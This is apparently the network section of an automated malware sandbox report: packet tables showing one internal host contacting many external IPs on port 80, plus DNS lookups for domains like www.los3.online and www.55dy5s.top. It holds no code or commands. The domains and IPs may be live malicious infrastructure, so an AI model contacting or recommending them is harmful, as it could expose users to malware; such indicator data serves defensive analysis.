Oct 11, 2023 22:55:52.465965986 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821332932 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.821417093 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.821475983 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.821531057 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.821557045 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821605921 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821641922 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.821661949 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821736097 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.821755886 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821858883 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821913004 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.821952105 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822020054 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822138071 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822185993 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.822206020 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822290897 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.822376966 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.822427034 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822494030 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822576046 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.822650909 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.822926044 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.822983980 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.823193073 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.823765039 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.823870897 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.823966980 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.823972940 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824065924 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824143887 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.824193001 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824206114 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.824301958 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.824342966 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824358940 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.824392080 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824413061 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.824521065 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824568987 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824765921 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.824807882 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.824939966 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:52.825089931 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:52.825141907 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:55:56.507685900 CEST	80	50012	103.72.68.128	192.168.11.20
Oct 11, 2023 22:55:56.507889986 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:56:01.426523924 CEST	50012	80	192.168.11.20	103.72.68.128
Oct 11, 2023 22:56:31.177169085 CEST	50013	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:31.415978909 CEST	80	50013	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:31.920159101 CEST	50013	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:32.158654928 CEST	80	50013	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:32.669914007 CEST	50013	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:32.908305883 CEST	80	50013	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:33.419889927 CEST	50013	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:33.658338070 CEST	80	50013	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:34.169574976 CEST	50013	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:34.409203053 CEST	80	50013	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:37.853737116 CEST	50014	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:38.088433027 CEST	80	50014	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:38.590642929 CEST	50014	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:38.825244904 CEST	80	50014	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:39.340440035 CEST	50014	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:39.576798916 CEST	80	50014	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:40.090354919 CEST	50014	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:40.324773073 CEST	80	50014	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:40.840130091 CEST	50014	80	192.168.11.20	172.177.169.252
Oct 11, 2023 22:56:41.074666977 CEST	80	50014	172.177.169.252	192.168.11.20
Oct 11, 2023 22:56:50.706363916 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.023437977 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.023660898 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.023724079 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.372153997 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372237921 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372294903 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372349024 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372406960 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372458935 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372513056 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372555971 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.372566938 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372622967 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372639894 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.372678041 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.372808933 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.372884989 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.525413990 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.690574884 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690651894 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690711021 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690766096 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690767050 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.690819979 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690876007 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690910101 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.690911055 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.690929890 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690984011 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.690985918 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.691076994 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.691127062 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.691137075 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.691174984 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.691288948 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:56:51.842700005 CEST	80	50015	91.195.240.123	192.168.11.20
Oct 11, 2023 22:56:51.842930079 CEST	50015	80	192.168.11.20	91.195.240.123
Oct 11, 2023 22:57:10.964304924 CEST	50016	80	192.168.11.20	104.18.233.42
Oct 11, 2023 22:57:11.130460024 CEST	80	50016	104.18.233.42	192.168.11.20
Oct 11, 2023 22:57:11.130716085 CEST	50016	80	192.168.11.20	104.18.233.42
Oct 11, 2023 22:57:11.130716085 CEST	50016	80	192.168.11.20	104.18.233.42
Oct 11, 2023 22:57:11.297513962 CEST	80	50016	104.18.233.42	192.168.11.20
Oct 11, 2023 22:57:11.300649881 CEST	80	50016	104.18.233.42	192.168.11.20
Oct 11, 2023 22:57:11.300685883 CEST	80	50016	104.18.233.42	192.168.11.20
Oct 11, 2023 22:57:11.301029921 CEST	50016	80	192.168.11.20	104.18.233.42
Oct 11, 2023 22:57:11.301029921 CEST	50016	80	192.168.11.20	104.18.233.42
Oct 11, 2023 22:57:11.467499971 CEST	80	50016	104.18.233.42	192.168.11.20
Oct 11, 2023 22:57:51.655069113 CEST	50017	80	192.168.11.20	3.64.163.50
Oct 11, 2023 22:57:51.976149082 CEST	80	50017	3.64.163.50	192.168.11.20
Oct 11, 2023 22:57:51.976587057 CEST	50017	80	192.168.11.20	3.64.163.50
Oct 11, 2023 22:57:51.976587057 CEST	50017	80	192.168.11.20	3.64.163.50
Oct 11, 2023 22:57:52.295638084 CEST	80	50017	3.64.163.50	192.168.11.20
Oct 11, 2023 22:57:52.296363115 CEST	80	50017	3.64.163.50	192.168.11.20
Oct 11, 2023 22:57:52.296444893 CEST	80	50017	3.64.163.50	192.168.11.20
Oct 11, 2023 22:57:52.296845913 CEST	50017	80	192.168.11.20	3.64.163.50
Oct 11, 2023 22:57:52.296845913 CEST	50017	80	192.168.11.20	3.64.163.50
Oct 11, 2023 22:57:52.617050886 CEST	80	50017	3.64.163.50	192.168.11.20
Oct 11, 2023 22:58:13.183810949 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.359282017 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.359488964 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.359546900 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.536360979 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.678128958 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.678544044 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.679874897 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.679963112 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.680073977 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.680154085 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.680197954 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.680213928 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.680241108 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.680269957 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.680389881 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.680391073 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.680445910 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:58:13.855501890 CEST	80	50018	34.120.249.181	192.168.11.20
Oct 11, 2023 22:58:13.855756044 CEST	50018	80	192.168.11.20	34.120.249.181
Oct 11, 2023 22:59:14.313854933 CEST	50019	80	192.168.11.20	130.185.109.77
Oct 11, 2023 22:59:14.630661964 CEST	80	50019	130.185.109.77	192.168.11.20
Oct 11, 2023 22:59:14.631052971 CEST	50019	80	192.168.11.20	130.185.109.77
Oct 11, 2023 22:59:14.631130934 CEST	50019	80	192.168.11.20	130.185.109.77
Oct 11, 2023 22:59:14.946495056 CEST	80	50019	130.185.109.77	192.168.11.20
Oct 11, 2023 22:59:14.946597099 CEST	80	50019	130.185.109.77	192.168.11.20
Oct 11, 2023 22:59:14.946644068 CEST	80	50019	130.185.109.77	192.168.11.20
Oct 11, 2023 22:59:14.947254896 CEST	50019	80	192.168.11.20	130.185.109.77
Oct 11, 2023 22:59:14.947254896 CEST	50019	80	192.168.11.20	130.185.109.77
Oct 11, 2023 22:59:15.262696981 CEST	80	50019	130.185.109.77	192.168.11.20
Oct 11, 2023 22:59:35.091941118 CEST	50020	80	192.168.11.20	154.12.93.8
Oct 11, 2023 22:59:35.267684937 CEST	80	50020	154.12.93.8	192.168.11.20
Oct 11, 2023 22:59:35.267853022 CEST	50020	80	192.168.11.20	154.12.93.8
Oct 11, 2023 22:59:35.376043081 CEST	50020	80	192.168.11.20	154.12.93.8
Oct 11, 2023 22:59:35.543479919 CEST	80	50020	154.12.93.8	192.168.11.20
Oct 11, 2023 22:59:35.545150042 CEST	80	50020	154.12.93.8	192.168.11.20
Oct 11, 2023 22:59:35.545212030 CEST	80	50020	154.12.93.8	192.168.11.20
Oct 11, 2023 22:59:35.545579910 CEST	50020	80	192.168.11.20	154.12.93.8
Oct 11, 2023 22:59:35.545581102 CEST	50020	80	192.168.11.20	154.12.93.8
Oct 11, 2023 22:59:35.713367939 CEST	80	50020	154.12.93.8	192.168.11.20
Oct 11, 2023 22:59:57.614970922 CEST	50021	80	192.168.11.20	154.197.227.142
Oct 11, 2023 22:59:57.794107914 CEST	80	50021	154.197.227.142	192.168.11.20
Oct 11, 2023 22:59:57.794378996 CEST	50021	80	192.168.11.20	154.197.227.142
Oct 11, 2023 22:59:57.794441938 CEST	50021	80	192.168.11.20	154.197.227.142
Oct 11, 2023 22:59:58.187613010 CEST	80	50021	154.197.227.142	192.168.11.20
Oct 11, 2023 22:59:58.297092915 CEST	50021	80	192.168.11.20	154.197.227.142
Oct 11, 2023 22:59:58.476474047 CEST	80	50021	154.197.227.142	192.168.11.20
Oct 11, 2023 22:59:59.100063086 CEST	80	50021	154.197.227.142	192.168.11.20
Oct 11, 2023 22:59:59.100368977 CEST	50021	80	192.168.11.20	154.197.227.142
Oct 11, 2023 22:59:59.100575924 CEST	80	50021	154.197.227.142	192.168.11.20
Oct 11, 2023 22:59:59.100761890 CEST	50021	80	192.168.11.20	154.197.227.142
Oct 11, 2023 23:00:16.032090902 CEST	50022	80	192.168.11.20	185.104.28.238
Oct 11, 2023 23:00:16.443535089 CEST	80	50022	185.104.28.238	192.168.11.20
Oct 11, 2023 23:00:16.443778038 CEST	50022	80	192.168.11.20	185.104.28.238
Oct 11, 2023 23:00:16.443831921 CEST	50022	80	192.168.11.20	185.104.28.238
Oct 11, 2023 23:00:16.782454014 CEST	80	50022	185.104.28.238	192.168.11.20
Oct 11, 2023 23:00:16.782540083 CEST	80	50022	185.104.28.238	192.168.11.20
Oct 11, 2023 23:00:16.782840014 CEST	50022	80	192.168.11.20	185.104.28.238
Oct 11, 2023 23:00:16.783077002 CEST	50022	80	192.168.11.20	185.104.28.238
Oct 11, 2023 23:00:17.105026007 CEST	80	50022	185.104.28.238	192.168.11.20
Oct 11, 2023 23:00:36.228127003 CEST	50023	80	192.168.11.20	15.197.142.173
Oct 11, 2023 23:00:36.460635900 CEST	80	50023	15.197.142.173	192.168.11.20
Oct 11, 2023 23:00:36.461003065 CEST	50023	80	192.168.11.20	15.197.142.173
Oct 11, 2023 23:00:36.461050034 CEST	50023	80	192.168.11.20	15.197.142.173
Oct 11, 2023 23:00:36.692616940 CEST	80	50023	15.197.142.173	192.168.11.20
Oct 11, 2023 23:00:36.693012953 CEST	80	50023	15.197.142.173	192.168.11.20
Oct 11, 2023 23:00:36.693075895 CEST	80	50023	15.197.142.173	192.168.11.20
Oct 11, 2023 23:00:36.693362951 CEST	50023	80	192.168.11.20	15.197.142.173
Oct 11, 2023 23:00:36.693577051 CEST	50023	80	192.168.11.20	15.197.142.173
Oct 11, 2023 23:00:36.925371885 CEST	80	50023	15.197.142.173	192.168.11.20
Oct 11, 2023 23:00:56.896045923 CEST	50024	80	192.168.11.20	208.91.197.39
Oct 11, 2023 23:00:57.132940054 CEST	80	50024	208.91.197.39	192.168.11.20
Oct 11, 2023 23:00:57.133284092 CEST	50024	80	192.168.11.20	208.91.197.39
Oct 11, 2023 23:00:57.133284092 CEST	50024	80	192.168.11.20	208.91.197.39
Oct 11, 2023 23:00:57.371278048 CEST	80	50024	208.91.197.39	192.168.11.20
Oct 11, 2023 23:00:57.410998106 CEST	80	50024	208.91.197.39	192.168.11.20
Oct 11, 2023 23:00:57.411431074 CEST	50024	80	192.168.11.20	208.91.197.39
Oct 11, 2023 23:00:57.411616087 CEST	50024	80	192.168.11.20	208.91.197.39
Oct 11, 2023 23:00:57.620256901 CEST	80	50024	208.91.197.39	192.168.11.20
Oct 11, 2023 23:00:57.620657921 CEST	50024	80	192.168.11.20	208.91.197.39
Oct 11, 2023 23:00:57.648839951 CEST	80	50024	208.91.197.39	192.168.11.20
Oct 11, 2023 23:01:17.461376905 CEST	50025	80	192.168.11.20	18.119.154.66
Oct 11, 2023 23:01:17.694283009 CEST	80	50025	18.119.154.66	192.168.11.20
Oct 11, 2023 23:01:17.694526911 CEST	50025	80	192.168.11.20	18.119.154.66
Oct 11, 2023 23:01:17.694616079 CEST	50025	80	192.168.11.20	18.119.154.66
Oct 11, 2023 23:01:17.927550077 CEST	80	50025	18.119.154.66	192.168.11.20
Oct 11, 2023 23:01:17.927615881 CEST	80	50025	18.119.154.66	192.168.11.20
Oct 11, 2023 23:01:17.928064108 CEST	50025	80	192.168.11.20	18.119.154.66
Oct 11, 2023 23:01:17.928064108 CEST	50025	80	192.168.11.20	18.119.154.66
Oct 11, 2023 23:01:18.160725117 CEST	80	50025	18.119.154.66	192.168.11.20
Oct 11, 2023 23:02:00.052288055 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.232425928 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.232800961 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.232801914 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.408894062 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.549660921 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.550118923 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.551999092 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.552156925 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.553028107 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.553029060 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.557723045 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.557792902 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.557837009 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.557879925 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.558008909 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.558008909 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.558320999 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:00.725831032 CEST	80	50026	34.120.249.181	192.168.11.20
Oct 11, 2023 23:02:00.726249933 CEST	50026	80	192.168.11.20	34.120.249.181
Oct 11, 2023 23:02:19.070638895 CEST	50027	80	192.168.11.20	104.247.82.94
Oct 11, 2023 23:02:19.313406944 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:19.314013958 CEST	50027	80	192.168.11.20	104.247.82.94
Oct 11, 2023 23:02:19.557720900 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:19.557969093 CEST	50027	80	192.168.11.20	104.247.82.94
Oct 11, 2023 23:02:19.800868988 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:19.800935984 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:19.800981045 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:19.801250935 CEST	50027	80	192.168.11.20	104.247.82.94
Oct 11, 2023 23:02:19.801250935 CEST	50027	80	192.168.11.20	104.247.82.94
Oct 11, 2023 23:02:20.008392096 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:20.008651972 CEST	50027	80	192.168.11.20	104.247.82.94
Oct 11, 2023 23:02:20.044275045 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:20.251121044 CEST	80	50027	104.247.82.94	192.168.11.20
Oct 11, 2023 23:02:39.664194107 CEST	50028	80	192.168.11.20	52.20.84.62
Oct 11, 2023 23:02:39.898385048 CEST	80	50028	52.20.84.62	192.168.11.20
Oct 11, 2023 23:02:39.898714066 CEST	50028	80	192.168.11.20	52.20.84.62
Oct 11, 2023 23:02:39.898715019 CEST	50028	80	192.168.11.20	52.20.84.62
Oct 11, 2023 23:02:40.132354975 CEST	80	50028	52.20.84.62	192.168.11.20
Oct 11, 2023 23:02:40.132421970 CEST	80	50028	52.20.84.62	192.168.11.20
Oct 11, 2023 23:02:40.132467985 CEST	80	50028	52.20.84.62	192.168.11.20
Oct 11, 2023 23:02:40.132774115 CEST	50028	80	192.168.11.20	52.20.84.62
Oct 11, 2023 23:02:40.132775068 CEST	50028	80	192.168.11.20	52.20.84.62
Oct 11, 2023 23:02:40.365951061 CEST	80	50028	52.20.84.62	192.168.11.20
Oct 11, 2023 23:03:21.208307028 CEST	50029	80	192.168.11.20	158.247.235.89
Oct 11, 2023 23:03:21.517761946 CEST	80	50029	158.247.235.89	192.168.11.20
Oct 11, 2023 23:03:21.518038988 CEST	50029	80	192.168.11.20	158.247.235.89
Oct 11, 2023 23:03:21.518776894 CEST	50029	80	192.168.11.20	158.247.235.89
Oct 11, 2023 23:03:21.828088999 CEST	80	50029	158.247.235.89	192.168.11.20
Oct 11, 2023 23:03:21.828180075 CEST	80	50029	158.247.235.89	192.168.11.20
Oct 11, 2023 23:03:21.828229904 CEST	80	50029	158.247.235.89	192.168.11.20
Oct 11, 2023 23:03:21.828556061 CEST	50029	80	192.168.11.20	158.247.235.89
Oct 11, 2023 23:03:21.828556061 CEST	50029	80	192.168.11.20	158.247.235.89
Oct 11, 2023 23:03:22.138191938 CEST	80	50029	158.247.235.89	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2023 22:56:31.002636909 CEST	55572	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:56:31.176006079 CEST	53	55572	1.1.1.1	192.168.11.20
Oct 11, 2023 22:56:37.672872066 CEST	64296	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:56:37.844975948 CEST	53	64296	1.1.1.1	192.168.11.20
Oct 11, 2023 22:56:50.416889906 CEST	51783	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:56:50.705388069 CEST	53	51783	1.1.1.1	192.168.11.20
Oct 11, 2023 22:57:10.740294933 CEST	49629	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:57:10.963449001 CEST	53	49629	1.1.1.1	192.168.11.20
Oct 11, 2023 22:57:51.482726097 CEST	52761	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:57:51.654177904 CEST	53	52761	1.1.1.1	192.168.11.20
Oct 11, 2023 22:58:12.039556980 CEST	53908	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:58:13.054533005 CEST	53908	53	192.168.11.20	9.9.9.9
Oct 11, 2023 22:58:13.182753086 CEST	53	53908	1.1.1.1	192.168.11.20
Oct 11, 2023 22:58:13.453666925 CEST	53	53908	9.9.9.9	192.168.11.20
Oct 11, 2023 22:58:32.597459078 CEST	54962	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:58:32.769113064 CEST	53	54962	1.1.1.1	192.168.11.20
Oct 11, 2023 22:58:53.155508995 CEST	63616	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:58:53.332053900 CEST	53	63616	1.1.1.1	192.168.11.20
Oct 11, 2023 22:59:13.807501078 CEST	64175	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:59:14.312978983 CEST	53	64175	1.1.1.1	192.168.11.20
Oct 11, 2023 22:59:34.366415024 CEST	63443	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:59:35.091145039 CEST	53	63443	1.1.1.1	192.168.11.20
Oct 11, 2023 22:59:54.939002991 CEST	62235	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:59:55.954035997 CEST	62235	53	192.168.11.20	9.9.9.9
Oct 11, 2023 22:59:56.969362020 CEST	62235	53	192.168.11.20	1.1.1.1
Oct 11, 2023 22:59:57.613934994 CEST	53	62235	1.1.1.1	192.168.11.20
Oct 11, 2023 22:59:57.613996029 CEST	53	62235	1.1.1.1	192.168.11.20
Oct 11, 2023 22:59:58.322488070 CEST	53	62235	9.9.9.9	192.168.11.20
Oct 11, 2023 23:00:15.496933937 CEST	50013	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:00:16.031229019 CEST	53	50013	1.1.1.1	192.168.11.20
Oct 11, 2023 23:00:36.055516005 CEST	53277	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:00:36.227343082 CEST	53	53277	1.1.1.1	192.168.11.20
Oct 11, 2023 23:00:56.612785101 CEST	59721	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:00:56.895217896 CEST	53	59721	1.1.1.1	192.168.11.20
Oct 11, 2023 23:01:17.157777071 CEST	50787	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:01:17.460161924 CEST	53	50787	1.1.1.1	192.168.11.20
Oct 11, 2023 23:01:37.697671890 CEST	49376	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:01:37.889991999 CEST	53	49376	1.1.1.1	192.168.11.20
Oct 11, 2023 23:01:37.890511990 CEST	49376	53	192.168.11.20	9.9.9.9
Oct 11, 2023 23:01:38.072316885 CEST	53	49376	9.9.9.9	192.168.11.20
Oct 11, 2023 23:02:18.813678026 CEST	50162	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:02:19.069736004 CEST	53	50162	1.1.1.1	192.168.11.20
Oct 11, 2023 23:02:39.355835915 CEST	58440	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:02:39.663219929 CEST	53	58440	1.1.1.1	192.168.11.20
Oct 11, 2023 23:03:20.458049059 CEST	49776	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:03:21.207601070 CEST	53	49776	1.1.1.1	192.168.11.20
Oct 11, 2023 23:03:43.865729094 CEST	64967	53	192.168.11.20	1.1.1.1
Oct 11, 2023 23:03:44.373981953 CEST	53	64967	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2023 22:56:31.002636909 CEST	192.168.11.20	1.1.1.1	0xd1d1	Standard query (0)	www.los3.online	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:56:37.672872066 CEST	192.168.11.20	1.1.1.1	0x1eea	Standard query (0)	www.los3.online	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:56:50.416889906 CEST	192.168.11.20	1.1.1.1	0x16eb	Standard query (0)	www.start399.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:57:10.740294933 CEST	192.168.11.20	1.1.1.1	0x4464	Standard query (0)	www.niaeoer.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:57:51.482726097 CEST	192.168.11.20	1.1.1.1	0x57ab	Standard query (0)	www.qualityquickprints.com	A (IP address)	IN (0x0001)	false
Oct 11, 2023 22:58:12.039556980 CEST	192.168.11.20	1.1.1.1	0x6966	Standard query (0)	www.55dy5s.top	A (IP address)	IN (0x0001)	false
